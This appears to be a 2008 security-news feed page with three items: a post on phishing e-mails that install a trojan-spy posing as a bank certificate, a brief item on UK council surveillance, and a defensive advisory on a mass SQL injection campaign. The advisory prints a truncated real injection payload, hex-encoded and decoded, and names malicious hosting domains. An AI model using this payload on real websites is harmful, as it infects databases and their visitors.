Fly Phishing

Some phishing gangs have a new technique. They’re using trojan-spy applications.

Last week we received the following e-mail message:

Notice that the message doesn’t mention anything about providing an account-name or password.

Instead, it attempts to convince the recipient that they need to install a Digital Certificate for enhanced safety.
(Anybody want to buy a bridge?)

The message links to a site with the following:




It’s basically a page full of jargon designed to overwhelm the potential victim. What happens if the victim falls for the bait and installs the "certificate"? A trojan-spy will be installed.

So now the phishers don’t need to ask for passwords anymore, they can just take them.

This technique keeps the classic element of phishing by mimicking the trusted institution - the bank. What they’ve adjusted is the part that people have become skeptical of, which is giving away their password when requested by e-mail.

Update: Here’s a brief video that we captured last week when the site was online. You’ll find it on the Lab’s YouTube Channel.

On 25/04/08 At 06:12 PM

Surveillance: Local Authorities in UK Spying on Residents

It seems having CCTV cameras popping up on every street corner is not enough, now councils are being granted permission to spy on people at the individual level. They are being given permission, upon approval, to spy on residents who they believe are causing them problems.

The local authorities involved are taking advantage of legislation that allows, at least in some cases, for individuals and households to be monitored over what seems pretty trivial issues such as whether dog owners are picking up waste. They are using a variety of techniques such as spy cameras and binoculars, depending on the situation. (more…)

Copyright © 2008 Spy Review. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact legal@spyreview.co.uk so we can take legal action immediately.

Mass SQL Injection

There’s another round of mass SQL injections going on which has infected hundreds of thousands of websites.

Performing a Google search results in over 510,000 modified pages.

As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it’s crucial to verify what information gets stored in or requested from those databases - especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera.

Unless that data is sanitized before it gets saved you can’t control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006…

Which when decoded becomes:

DECLARE @T varchar(255)’@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name’b.name from sysobjects a’syscolumns b
where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35
or b…

What happens as a result? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code.

So far three different domains have been used to host the malicious content - nmidahena.com, aspder.com and nihaorr1.com. There’s a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are unaccessible but that could change. So if you’re a firewall administrator we recommend you to block access to them.

So what should you do?

First of all, search your website logs for the code above and see if you’ve been hit. If so, clean up your database to prevent your website visitors from becoming infected. Second, make sure that all the data you pass to your database is sanitized and that no code elements can be stored there. Third, block access to the sites above. Fourth, make sure the software you use is patched, F-Secure Health Check is an easy way to do this. Fifth, keep your antivirus solution up-to-date.

UPDATE: We’ve received some questions on the platform and operating systems affected by this attack. So far we’ve only seen websites using Microsoft IIS Web Server and Microsoft SQL Server being hit. Do note that this attack doesn’t use vulnerabilities in any of those two applications. What makes this attack possible is poorly written ASP and ASPX (.net) code.

On 24/04/08 At 03:59 AM